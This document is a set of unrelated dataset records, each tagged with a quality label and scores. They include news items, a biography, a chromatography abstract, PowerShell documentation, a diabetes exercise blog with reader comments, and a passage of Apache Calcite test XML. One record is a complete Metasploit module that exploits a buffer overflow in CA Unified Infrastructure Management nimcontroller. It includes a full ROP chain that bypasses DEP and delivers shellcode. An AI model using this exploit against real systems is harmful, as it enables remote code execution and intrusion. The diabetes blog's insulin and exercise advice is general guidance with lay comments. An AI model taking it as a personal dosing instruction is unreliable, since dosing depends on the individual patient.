Mr Trump, who has described him as "one of the best all time boxing legends". In the interview, the boxer also defended Mr Trump against allegations of support for racist groups. "You never heard anything about Donald Trump being racist until he ran for president," Mayweather said. Mr Trump has been criticised over his response to deadly clashes at a far-right rally, held by neo-Nazis and white supremacists, in Charlottesville, Virginia, last month. On Thursday Mr Trump repeated his assertion that "both sides" were at fault. Meanwhile a presenter for ESPN TV has apologised after calling Mr Trump a "white supremacist" on social media - an allegation described by the White House as "outrageous". | Low | [
0.508946322067594,
32,
30.875
] |
Juan Mendez Associated Countries Interviewed Share Video Description When someone is in solitary confinement, guards and other prison personnel do not count as meaningful social contact. The military rules on interrogation allow separation of an inmate for up to 30 days, with renewal, but this is a form of coercion and is impermissible in international law. Point of View Issues Biography Juan Mendez was appointed UN Special Rapporteur on Torture and Other Cruel, Inhuman and Degrading Treatment or Punishment in November 2010. Born in Argentina, Mendez began his human rights work in the 1970’s representing political prisoners of the Argentinian military dictatorship. He was arrested and tortured as a result, and then expelled from Argentina in 1977. He moved to the United States. Since leaving Argentina, Mendez has been general counsel for Human Rights Watch; the Executive Director of the Inter-American Institute of Human Rights in Costa Rica; president of the Inter-American Commission on Human Rights; Special Advisor on the Prevention of Genocide to then UN Secretary General, Kofi Anan; president of the International Center for Transitional Justice; and Special Advisor to the Prosecutor of the International Criminal Court. Mendez has taught law at various universities including Georgetown Law School and Oxford University. He has also received numerous awards for his work in international human rights law. Mendez stepped down as Special Rapporteur in October 2016. He now teaches human rights law at American University’s Washington College of Law. He also oversees the UN Anti-Torture Initiative. | High | [
0.657142857142857,
34.5,
18
] |
Robert Andrzejczak (center) is introduced as a candidate for state Assembly by Sen. Jeff Van Drew (left) and Assemblyman Nelson Albano at the Cosmopolitan Restaurant in Vineland on Thursday. Written by Joseph P. Smith New Jersey Press Media Assemblyman Matthew Milam announced his immediate resignation Thursday, yielding his unexpired term representing the 1st Legislative District - as well as his endorsement - to a souldier badly wounded in Iraq. Cape May County resident Robert Andrzejczak, a former Army sergeant who lost his left leg above the knee in a grenade attack, is expected to be seated in the Assembly this month. Milam made his first run for the Assembly in the 2007 campaign, as a replacement for state Sen. Jeff Van Drew in that seat. Van Drew was making an ultimately successful run for state Senate. Milam was paired with ... | Low | [
0.536885245901639,
32.75,
28.25
] |
Comparison of columns packed with porous sub-2 microm particles and superficially porous sub-3 microm particles for peptide analysis at ambient and high temperature. The objective of this study was to evaluate various chromatographic approaches for peptide analysis. Initially, the ultra-HPLC (UHPLC) strategy, which consists of using columns packed with sub-2 microm particles at a maximal pressure of 1000 bar, was tested. To limit the backpressure generated by small particles, columns packed with superficially porous sub-3 microm particles (fused-core technology) that should theoretically improve mass transfer, particularly beneficial for large biomolecules, were investigated. To evaluate these claims, kinetic plots were constructed in both isocratic and gradient modes at ambient and elevated temperature (up to 90 degrees C). For peptide analysis, both UHPLC and fused-core technologies showed a significant gain in peak capacity when compared with conventional HPLC using 5 mum particles and monolithic supports. Additionally, it has been shown that high temperature was of utmost interest to further improve kinetic performance and peak shape due to the improvement of secondary interaction kinetics. Finally, the best conditions developed for UHPLC using the gradient kinetic plot methodology were applied to the analysis of a complex tryptic digest of various proteins. The expected and experimental peak capacity values obtained were similar. In addition, the resolving power of UHPLC at 60 degrees C was appropriate for resolving complex mixtures of peptides. | High | [
0.6617283950617281,
33.5,
17.125
] |
--- external help file: Microsoft.Rtc.Management.dll-help.xml online version: https://docs.microsoft.com/powershell/module/skype/get-cscomputer applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 title: Get-CsComputer schema: 2.0.0 manager: rogupta author: hirenshah1 ms.author: hirshah ms.reviewer: --- # Get-CsComputer ## SYNOPSIS Returns information about the computers that perform service roles within your Skype for Business Server infrastructure. This cmdlet was introduced in Lync Server 2010. ## SYNTAX ### Identity ``` Get-CsComputer [[-Identity] <XdsGlobalRelativeIdentity>] [-Pool <String>] [-Local] [<CommonParameters>] ``` ### Filter ``` Get-CsComputer [-Filter <String>] [-Pool <String>] [-Local] [<CommonParameters>] ``` ## DESCRIPTION The Get-CsComputer cmdlet provides a way to quickly identify computers that are running Skype for Business Server services or server roles. Called without any parameters, the Get-CsComputer cmdlet returns a collection of all the computers that are running Skype for Business Server services or server roles; this collection includes the Identity, pool name, and fully qualified domain name (FQDN) for each computer. Alternatively, you can use optional parameters such as Identity, Filter, or Pool to limit the returned data to a single computer or set of computers. ## EXAMPLES ### -------------------------- Example 1 -------------------------- ``` Get-CsComputer ``` In Example 1 the Get-CsComputer cmdlet is used to return information about all the computers that perform service roles within your Skype for Business Server 2015 infrastructure. ### -------------------------- Example 2 -------------------------- ``` Get-CsComputer -Filter "*.litwareinc.com" ``` The command shown in Example 2 uses the Filter parameter to return only those service role computers that are part of the litwareinc.com domain. The wildcard string *.litwareinc.com restricts the returned information to computers that have an FQDN that ends with the string value ".litwareinc.com". ### -------------------------- Example 3 -------------------------- ``` Get-CsComputer -Identity "atl-cs-001.litwareinc.com" ``` In Example 3, the Identity parameter is used to limit the returned data to the one computer that has the FQDN atl-cs-001.litwareinc.com. ### -------------------------- Example 4 -------------------------- ``` Get-CsComputer -Pool "atl-cs-001.litwareinc.com" ``` In Example 4, the Pool parameter is used to return information about all the computers found in the pool atl-cs-001.litwareinc.com. ## PARAMETERS ### -Identity FQDN of the computer to be returned. For example: `-Identity "atl-cs-001.litwareinc.com".` If this parameter is not specified, all of the computers running Skype for Business Server will be returned. ```yaml Type: XdsGlobalRelativeIdentity Parameter Sets: Identity Aliases: Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: 2 Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -Filter Enables you to use wildcard characters when specifying the Identity of the computer (or computers) to be returned. For example, this command returns information about all the computers that have an Identity that begins with the string value "atl-": -Filter "atl-*". ```yaml Type: String Parameter Sets: Filter Aliases: Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -Pool FQDN of a Skype for Business Server pool. When you use this parameter, information about all the computers in the specified pool will be returned. ```yaml Type: String Parameter Sets: (All) Aliases: Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -Local When present, returns information only for the local computer. ```yaml Type: SwitchParameter Parameter Sets: (All) Aliases: Applicable: Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### CommonParameters This cmdlet supports the common parameters: -Debug, -ErrorAction, -ErrorVariable, -InformationAction, -InformationVariable, -OutVariable, -OutBuffer, -PipelineVariable, -Verbose, -WarningAction, and -WarningVariable. For more information, see about_CommonParameters (https://go.microsoft.com/fwlink/?LinkID=113216). ## INPUTS ### None ## OUTPUTS ### Microsoft.Rtc.Management.Deploy.Internal.Machine ## NOTES ## RELATED LINKS [Disable-CsComputer](Disable-CsComputer.md) [Enable-CsComputer](Enable-CsComputer.md) [Test-CsComputer](Test-CsComputer.md) | Mid | [
0.617021276595744,
29,
18
] |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller. The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list probe. Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the directory_list probe. }, 'License' => MSF_LICENSE, 'Author' => [ 'wetw0rk' # Vulnerability Discovery and Metasploit module ], 'References' => [ [ 'CVE', '2020-8010' ], # CA UIM Probe Improper ACL Handling RCE (Multiple Attack Vectors) [ 'CVE', '2020-8012' ], # CA UIM nimbuscontroller Buffer Overflow RCE [ 'URL', 'https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832' ], [ 'PACKETSTORM', '156577' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'AUTORUNSCRIPT' => 'post/windows/manage/migrate' }, 'Payload' => { 'Space' => 2000, 'DisableNops' => true }, 'Platform' => 'win', 'Arch' => ARCH_X64, 'Targets' => [ [ 'Windows Universal (x64) - v7.80.3132', { 'Platform' => 'win', 'Arch' => [ARCH_X64], 'Version' => '7.80 [Build 7.80.3132, Jun 1 2015]', 'Ret' => 0x000000014006fd3d # pop rsp; or al, 0x00; add rsp, 0x0000000000000448 ; ret [controller.exe] } ], ], 'Privileged' => true, 'Notes' => { 'Stability' => [ CRASH_SAFE ] }, 'DisclosureDate' => 'Feb 05 2020', 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('DIRECTORY', [false, 'Directory path to obtain a listing', 'C:\\']), Opt::RPORT(48000), ] ) end # check: there are only two prerequisites to getting code execution. The version number # and access to the directory_list probe. The easiest way to get this information is to # ask nicely ;) def check connect sock.put(generate_probe('get_info', ['interfaces=0'])) response = sock.get_once(4096) list_check = -1 begin if target['Version'].in? response print_status("Version #{target['Version']} detected, sending directory_list probe") sock.put(generate_probe('directory_list', ["directory=#{datastore['DIRECTORY']}", 'detail=1'])) list_check = parse_listing(sock.get_once(4096), datastore['DIRECTORY']) end ensure disconnect end if list_check == 0 return CheckCode::Appears else return CheckCode::Safe end end def exploit super connect shellcode = make_nops(500) shellcode << payload.encoded offset = rand_text_alphanumeric(1000) offset += "\x0f" * 33 heap_flip = [target.ret].pack('<Q*') alignment = rand_text_alphanumeric(7) # Adjustment for the initial chain rop_chain = generate_rsp_chain # Stage1: Stack alignment rop_chain += rand_text_alphanumeric(631) # Adjust for second stage rop_chain += generate_rop_chain # Stage2: GetModuleHandleA, GetProcAddressStub, VirtualProtectStub rop_chain += rand_text_alphanumeric((3500 - # ROP chain MUST be 3500 bytes, or exploitation WILL fail rop_chain.length )) rop_chain += "kernel32.dll\x00" rop_chain += "VirtualProtect\x00" trigger = "\x10" * (8000 - ( offset.length + heap_flip.length + alignment.length + rop_chain.length + shellcode.length ) ) buffer = offset + heap_flip + alignment + rop_chain + shellcode + trigger exploit_packet = generate_probe( 'directory_list', ["directory=#{buffer}"] ) sock.put(exploit_packet) disconnect end # generate_rsp_chain: This chain will re-align RSP / Stack, it MUST be a multiple of 16 bytes # otherwise our call will fail. I had VP work 50% of the time when the stack was unaligned. def generate_rsp_chain rop_gadgets = [0x0000000140018c42] * 20 # ret rop_gadgets += [ 0x0000000140002ef6, # pop rax ; ret 0x00000001401a3000, # *ptr to handle reference ( MEM_COMMIT | PAGE_READWRITE | MEM_IMAGE ) 0x00000001400af237, # pop rdi ; ret 0x0000000000000007, # alignment for rsp 0x0000000140025dab ] # add esp, edi ; adc byte [rax], al ; add rsp, 0x0000000000000278 ; ret return rop_gadgets.pack('<Q*') end # generate_rop_chain: This chain will craft function calls to GetModuleHandleA, GetProcAddressStub, # and finally VirtualProtectStub. Once completed, we have bypassed DEP and can get code execution. # Since we dynamically generate VirtualProtectStub, we needn't worry about other OS's. def generate_rop_chain # RAX -> HMODULE GetModuleHandleA( # ( RCX == *module ) LPCSTR lpModuleName, # ); rop_gadgets = [0x0000000140018c42] * 15 # ret rop_gadgets += [ 0x0000000140002ef6, # pop rax ; ret 0x0000000000000000, # (zero out rax) 0x00000001400eade1, # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000 ] # rop_gadgets += [0x0000000140018c42] * 10 # ret rop_gadgets += [ 0x0000000140131643, # pop rcx ; ret 0x00000000000009dd, # offset to "kernel32.dll" 0x000000014006d8d8 ] # add rax, rcx ; add rsp, 0x38 ; ret rop_gadgets += [0x0000000140018c42] * 15 # ret rop_gadgets += [0x00000001400b741b] # xchg eax, ecx ; ret rop_gadgets += [ 0x0000000140002ef6, # pop rax ; ret 0x000000014015e310, # GetModuleHandleA (0x00000000014015E330-20) 0x00000001400d1161 ] # call qword ptr [rax+20] ; add rsp, 0x40 ; pop rbx ; ret rop_gadgets += [0x0000000140018c42] * 17 # ret # RAX -> FARPROC GetProcAddressStub( # ( RCX == &addr ) HMODULE hModule, # ( RDX == *module ) lpProcName # ); rop_gadgets += [ 0x0000000140111c09, # xchg rax, r11 ; or al, 0x00 ; ret (backup &hModule) 0x0000000140002ef6, # pop rax ; ret 0x0000000000000000, # (zero out rax) 0x00000001400eade1, # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000 ] # rop_gadgets += [0x0000000140018c42] * 10 # ret rop_gadgets += [ 0x0000000140131643, # pop rcx ; ret 0x0000000000000812, # offset to "virtualprotectstub" 0x000000014006d8d8 ] # add rax, rcx ; add rsp, 0x38 ; ret rop_gadgets += [0x0000000140018c42] * 15 # ret rop_gadgets += [0x0000000140135e39] # mov edx, eax ; mov rbx, qword [rsp+0x30] ; mov rbp, qword [rsp+0x38] ; mov rsi, qword [rsp+0x40] # mov rdi, qword [rsp+0x48] ; mov eax, edx ; add rsp, 0x20 ; pop r12 ; ret rop_gadgets += [0x0000000140018c42] * 10 # ret rop_gadgets += [0x00000001400d1ab8] # mov rax, r11 ; add rsp, 0x30 ; pop rdi ; ret rop_gadgets += [0x0000000140018c42] * 10 # ret rop_gadgets += [0x0000000140111ca1] # xchg rax, r13 ; or al, 0x00 ; ret rop_gadgets += [ 0x00000001400cf3d5, # mov rcx, r13 ; mov r13, qword [rsp+0x50] ; shr rsi, cl ; mov rax, rsi ; add rsp, 0x20 ; pop rdi ; pop rsi ; pop rbp ; ret 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000 ] # rop_gadgets += [0x0000000140018c42] * 6 # ret rop_gadgets += [ 0x0000000140002ef6, # pop rax ; ret 0x000000014015e318 ] # GetProcAddressStub (0x00000000014015e338-20) rop_gadgets += [0x00000001400d1161] # call qword ptr [rax+20] ; add rsp, 0x40 ; pop rbx ; ret rop_gadgets += [0x0000000140018c42] * 17 # ret # RAX -> BOOL VirtualProtectStub( # ( RCX == *shellcode ) LPVOID lpAddress, # ( RDX == len(shellcode) ) SIZE_T dwSize, # ( R8 == 0x0000000000000040 ) DWORD flNewProtect, # ( R9 == *writeable location ) PDWORD lpflOldProtect, # ); rop_gadgets += [ 0x0000000140111c09, # xchg rax, r11 ; or al, 0x00 ; ret (backup *VirtualProtectStub) 0x000000014013d651, # pop r12 ; ret 0x00000001401fb000, # *writeable location ( MEM_COMMIT | PAGE_READWRITE | MEM_IMAGE ) 0x00000001400eba74 ] # or r9, r12 ; mov rax, r9 ; mov rbx, qword [rsp+0x50] ; mov rbp, qword [rsp+0x58] ; add rsp, 0x20 ; pop r12 ; pop rdi ; pop rsi ; ret rop_gadgets += [0x0000000140018c42] * 10 # ret rop_gadgets += [ 0x0000000140002ef6, # pop rax ; ret 0x0000000000000000 ] rop_gadgets += [ 0x00000001400eade1, # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000 ] # rop_gadgets += [0x0000000140018c42] * 10 # ret rop_gadgets += [ 0x0000000140131643, # pop rcx ; ret 0x000000000000059f, # (offset to *shellcode) 0x000000014006d8d8 ] # add rax, rcx ; add rsp, 0x38 ; ret rop_gadgets += [0x0000000140018c42] * 15 # ret rop_gadgets += [0x00000001400b741b] # xchg eax, ecx ; ret rop_gadgets += [ 0x00000001400496a2, # pop rdx ; ret 0x00000000000005dc ] # dwSize rop_gadgets += [ 0x00000001400bc39c, # pop r8 ; ret 0x0000000000000040 ] # flNewProtect rop_gadgets += [0x00000001400c5f8a] # mov rax, r11 ; add rsp, 0x38 ; ret (RESTORE VirtualProtectStub) rop_gadgets += [0x0000000140018c42] * 17 # ret rop_gadgets += [0x00000001400a0b55] # call rax ; mov rdp qword ptr [rsp+48h] ; mov rsi, qword ptr [rsp+50h] # mov rax, rbx ; mov rbx, qword ptr [rsp + 40h] ; add rsp,30h ; pop rdi ; ret rop_gadgets += [0x0000000140018c42] * 20 # ret rop_gadgets += [ 0x0000000140002ef6, # pop rax ; ret (CALL COMPLETE, "JUMP" INTO OUR SHELLCODE) 0x0000000000000000, # (zero out rax) 0x00000001400eade1, # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000, # 0x0000000000000000 ] # rop_gadgets += [0x0000000140018c42] * 10 # ret rop_gadgets += [ 0x0000000140131643, # pop rcx ; ret 0x0000000000000317, # (offset to our shellcode) 0x000000014006d8d8 ] # add rax, rcx ; add rsp, 0x38 ; ret rop_gadgets += [0x0000000140018c42] * 15 # ret rop_gadgets += [0x00000001400a9747] # jmp rax rop_gadgets += [0x0000000140018c42] * 20 # ret (do not remove) return rop_gadgets.pack('<Q*') end # parse_listing: once the directory_list probe is sent we're returned a directory listing # unfortunately it's hard to read this simply "decodes" it def parse_listing(response, directory) result = { 'name' => '', 'date' => '', 'size' => '', 'type' => '' } i = 0 begin dirlist = response.split('\x00')[0].split("\x00") index = dirlist.index('entry') + 3 final = dirlist[index..-1] rescue StandardError print_error('Failed to gather directory listing') return -1 end print_line("\n Directory of #{directory}\n") check = 0 name = 0 ftime = 0 size = 0 ftype = 0 while i < final.length if name == 1 unless final[i].to_i > 0 result['name'] = final[i] name = 0 check += 1 end end if size >= 1 if size == 3 result['size'] = final[i] size = 0 check += 1 else size += 1 end end if ftype >= 1 if ftype == 3 result['type'] = final[i] ftype = 0 check += 1 else ftype += 1 end end if ftime >= 1 if ftime == 3 result['date'] = final[i] ftime = 0 check += 1 else ftime += 1 end end if final[i].include? 'name' name = 1 end if final[i].include? 'size' size = 1 end if final[i].include? 'size' ftype = 1 end if final[i].include? 'last_modified' ftime = 1 end i += 1 next unless check == 4 if result['type'] == '2' result['type'] = '' else result['type'] = '<DIR>' result['size'] = '' end begin time = Time.at(result['date'].to_i) timestamp = time.strftime('%m/%d/%Y %I:%M %p') rescue StandardError timestamp = '??/??/???? ??:?? ??' end print_line(format('%20<timestamp>s %6<type>s %<name>s', timestamp: timestamp, type: result['type'], name: result['name'])) check = 0 end print_line('') return 0 end # generate_probe: The nimcontroller utilizes the closed source protocol nimsoft so we need to specially # craft probes in order for the controller to accept any input. def generate_probe(probe, args) client = "#{rand_text_alphanumeric(14)}\x00" packet_args = '' probe += "\x00" for arg in args c = '' i = 0 while c != '=' c = arg[i] i += 1 end packet_args << "#{arg[0, (i - 1)]}\x00" packet_args << "1\x00#{arg[i..-1].length + 1}\x00" packet_args << "#{arg[i..-1]}\x00" end packet_header = 'nimbus/1.0 ' # nimbus header (length of body) (length of args) packet_body = "mtype\x00" # mtype packet_body << "7\x004\x00100\x00" # 7.4.100 packet_body << "cmd\x00" # cmd packet_body << "7\x00#{probe.length}\x00" # 7.(length of probe) packet_body << probe # probe packet_body << "seq\x00" # seq packet_body << "1\x002\x000\x00" # 1.2.0 packet_body << "ts\x00" # ts packet_body << "1\x0011\x00#{rand_text_alphanumeric(10)}\x00" # 1.11.(UNIX EPOCH TIME) packet_body << "frm\x00" # frm packet_body << "7\x00#{client.length}\x00" # 7.(length of client) packet_body << client # client address packet_body << "tout\x00" # tout packet_body << "1\x004\x00180\x00" # 1.4.180 packet_body << "addr\x00" # addr packet_body << "7\x000\x00" # 7.0 # # probe packet arguments (dynamic) # argument # length of arg value # argument value packet_header << "#{packet_body.length} #{packet_args.length}\r\n" probe = packet_header + packet_body + packet_args return probe end end | Mid | [
0.561946902654867,
31.75,
24.75
] |
Living with diabetes blog Diabetes: Balancing your insulin, medication and exercise Controlling diabetes is a balancing act. You must carefully balance food, activity (exercise), and medications and insulin. All three are equally important to your health, and each can increase or decrease your blood glucose levels. Many of our readers ask if they need to adjust their insulin or medication before exercise. Physical activity, or exercise, includes anything that gets you moving, such as walking, dancing or working in your garden. Staying active improves your overall health. Regular exercise helps you: Better control glucose levels Increase overall fitness Feel more energetic Improve flexibility Improve blood pressure Lower your risk of developing cardiovascular disease Improve your appearance, weight and overall sense of well-being Insulin and diabetes medications lower your blood glucose. The amount of medication you need is unique to you. The time of day you take your medication and how much you take are important factors in allowing your medication to work when your blood glucose rises. As you make exercise a part of your life, your diabetes health care provider may change or adjust your medications based on the results recorded in your diabetes record book. It's a balancing act — if you eat more than your meal plan allows, your blood glucose level may rise, or, if you exercise less than usual, your blood glucose level may rise. Several factors affect your blood glucose during activity or exercise: Your physical condition Length of activity or exercise Type of activity or exercise Blood glucose level prior to exercising When you're more active than usual, your blood glucose may drop too low, causing low blood glucose (hypoglycemia). It's important that you prepare ahead of time. If you're taking insulin and you know ahead of time when you will exercise, decrease your rapid or short insulin meal dose before the activity instead of taking extra food during the activity. Talk with your diabetes health care team for help making the decision about how much to decrease your insulin dose. Also, avoid injecting insulin into your arms and legs that you will use during your activity or exercise. An abdominal injection site may help lower the risk for hypoglycemia associated with exercise. Some additional tips: Test your blood glucose before, during and after the activity to monitor how it affects your blood glucose level. This is important when beginning or changing your exercise program. When your insulin is peaking, exercise isn't recommended, as it may lead to low blood glucose. Before you exercise, take less insulin or eat more food at mealtime or as a snack. If your blood glucose is less than 70 mg/dL (3.8 mmol/L), take 1 to 2 carbohydrate choices and make sure your blood glucose is in goal range before you begin the activity or exercise. If you were in goal range before the activity and the activity drops your blood glucose more than 30 to 50 mg/dL (1.6 to 2.7 mmol/L) or hypoglycemia occurs — blood glucose less than 70 mg/dL (3.8 mmol/L) — stop exercising and take 1 carbohydrate choice. Recheck your blood glucose after 15 minutes and repeat until your blood sugar returns to a safe range. Then, return to your exercise and take 1 carbohydrate every 30 to 60 minutes while you're active. Don't exercise if your blood glucose is greater than 300 mg/dL (16 mmol/L). Exercising with blood glucoses over 300 mg/dL (16 mmol/L) can raise your blood glucose even more, because exercise causes the body to release or produce extra glucose and there won't be enough insulin available to use it. With harder or more strenuous activity, even if you're within goal range or above goal, 2 carbohydrate choices may be necessary to prevent low blood glucose. Ask your health care provider if you have questions about this. For longer duration or very strenuous activities, such as downhill/cross country skiing or long bike rides, take 1 carbohydrate choice every 30 to 60 minutes during the activity. Check your blood glucose every 1 to 2 hours during the activity. It isn't recommended that you be active or exercise when you're sick. We generally don't recommend exercising before bed due to the risk of delayed post-exercise hypoglycemia. If evening exercise is necessary, consider eating an extra carbohydrate after exercise to reduce the risk of hypoglycemia while sleeping. Remember, it's essential to check with your health care provider if you've been sedentary and want to begin an exercise routine. Didn't answer my question. I am a thin individual with type 2 diabetes, caused by a whipple surgery. If my blood sugar is 94 before breakfast and I take the prescribed amount of insulin (4 units) and then exercise within I/2 hour after breakfast, my blood levels will drop drastically after the exercise. Should I eat more carbs and take less insulin, wait about an hour and then exercise? Mark Swartz November 9, 2016 1:42 p.m. This information was so helpful thank Esther November 8, 2016 5:27 p.m. Please talk about high blood sugars. I struggle with them daily even with an insulin pump. Victoria November 8, 2016 11:34 a.m. Great info. Stavros September 9, 2016 11:37 p.m. Thanks for the great content. you have helped me fill knowledge gaps. Thanks Melissa Tower March 11, 2016 12:51 p.m. Very helpful. I'm 69 years old and a type1 diabetic since age 19. We bike, kayak and/or walk everyday. What make it difficult to maintain proper levels, is not the activity, but what that activity may entail. For example, we went kayaking and needed to carry two kayaks 100 yards to reach the water and then back to the car after 2 hours in the water. That was too much and blood sugar level dropped dangerously low. Yes I had my moniter and plenty of snacks but not for that activity. Energy conservation is also very important. Get the details about any activity and skip those that may zap you before you begin. Conserve energy and use it to have fun!! Frank M March 18, 2015 5:03 a.m. good article. useful joseph kirema March 17, 2015 4:00 p.m. Thank you Peggy, I have been type 1 diabetic for47 years. I agree with what you have said. And you said it very well. I am passing this onto my husband to read, so he better understands. Ann Ann Pownall March 17, 2015 1:53 p.m. Exercise is like medication. This is where it gets complicated for people on insulin or on other medications that can produce hypoglycemia. While it is true that regular exercise helps you better control glucose levels, lows before the insulin doses are adjusted can assert themselves after just a few days of regular exercise. This is where you recommend that “your diabetes health care provider may change or adjust your medications based on the results recorded in your diabetes record book.” From experience, I can say that it is hard to anticipate which night this will happen--and it always seems to be at night when it happens--unless you anticipate needing less insulin before you actually experience a low. Recall also that most physicians are not available to review a record book at the drop of a hat. There has to be something that can tip a patient off before having to risk whether the low will wake them up. Any ideas? Barbara March 17, 2015 12:09 p.m. Is there a certain amount of glucose in the bloodstream that causes problems Linda bonebrake March 17, 2015 11:45 a.m. Balancing exercise with insulin injections is truly a challenge that can cause a great deal of anxiety. The fact is that it is not a normal way to live, but what choice does one have? One must stay active as possible and try to manage the ups and downs of blood sugar fluctuations. Perhaps one day, easier methods of blood sugar monitoring will be made possible and other methods of regulating glucose levels will help people with this condition live an easier life. Better yet, perhaps, one day, diabetes will be eradicated. George November 13, 2013 9:50 p.m. I think the hard part is getting to admit you have it and that as young as you are people of all ages and fitness levels get. Its a mental nightmare at first. Lean on friends and family.You are not alone! With care,diet,meds,exercise,and patience. LIFE WILL BE GOOD! Rocky September 29, 2013 8:34 a.m. You read a lot about exercise and insulin, but I often wonder what adjustments should a DM non-insulin dependent should make prior to exercising? Plus, what are good source of 1 or 2 carbohydrates intake? Minnie September 22, 2013 2:57 p.m. must disagree with your advice about not exercising before bed. in my opinion their should never be any type of discouragement to exercising. benefits from any exercise far outweighs possible side effects. of course you can find extreme situations where their are adverse affects but for the 99.9% who will benefit their should be overwhelming encouragement. i credit exercising (and diet) with going from a a1c of 12 to an a1c of 5.5 without any medication.i'm not any kind of fitness freak at still over 275 lbs. i have been able to swim(very slow pace) and walk. just an average american who let their weight get away but through peoples encouragement to exercise even a little when i could good things have been happening for over a year. Legal Conditions and Terms Reprint Permissions A single copy of these materials may be reprinted for noncommercial personal use only. "Mayo," "Mayo Clinic," "MayoClinic.org," "Mayo Clinic Healthy Living," and the triple-shield Mayo Clinic logo are trademarks of Mayo Foundation for Medical Education and Research. | High | [
0.663573085846867,
35.75,
18.125
] |
<?xml version="1.0" ?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <Root> <TestCase name="testReplaceCommonSubexpression"> <Resource name="sql"> <![CDATA[select d1.deptno from (select * from dept) d1, (select * from dept) d2]]> </Resource> <Resource name="planBefore"> <![CDATA[ LogicalProject(DEPTNO=[$0]) LogicalJoin(condition=[true], joinType=[inner]) LogicalProject(DEPTNO=[$0], NAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) LogicalProject(DEPTNO=[$0], NAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) ]]> </Resource> <Resource name="planAfter"> <![CDATA[ LogicalProject(DEPTNO=[$0]) LogicalJoin(condition=[true], joinType=[inner]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) ]]> </Resource> </TestCase> <TestCase name="testMatchUntilFixpoint"> <Resource name="sql"> <![CDATA[(select name from dept union select ename from emp) union (select ename from bonus)]]> </Resource> <Resource name="planBefore"> <![CDATA[ LogicalUnion(all=[false]) LogicalUnion(all=[false]) LogicalProject(NAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) LogicalProject(ENAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, EMP]]) LogicalProject(ENAME=[$0]) LogicalTableScan(table=[[CATALOG, SALES, BONUS]]) ]]> </Resource> <Resource name="planAfter"> <![CDATA[ LogicalAggregate(group=[{0}]) LogicalUnion(all=[true]) LogicalAggregate(group=[{0}]) LogicalUnion(all=[true]) LogicalProject(NAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) LogicalProject(ENAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, EMP]]) LogicalProject(ENAME=[$0]) LogicalTableScan(table=[[CATALOG, SALES, BONUS]]) ]]> </Resource> </TestCase> <TestCase name="testMatchLimitOneTopDown"> <Resource name="sql"> <![CDATA[(select name from dept union select ename from emp) union (select ename from bonus)]]> </Resource> <Resource name="planBefore"> <![CDATA[ LogicalUnion(all=[false]) LogicalUnion(all=[false]) LogicalProject(NAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) LogicalProject(ENAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, EMP]]) LogicalProject(ENAME=[$0]) LogicalTableScan(table=[[CATALOG, SALES, BONUS]]) ]]> </Resource> <Resource name="planAfter"> <![CDATA[ LogicalAggregate(group=[{0}]) LogicalUnion(all=[true]) LogicalUnion(all=[false]) LogicalProject(NAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, DEPT]]) LogicalProject(ENAME=[$1]) LogicalTableScan(table=[[CATALOG, SALES, EMP]]) LogicalProject(ENAME=[$0]) 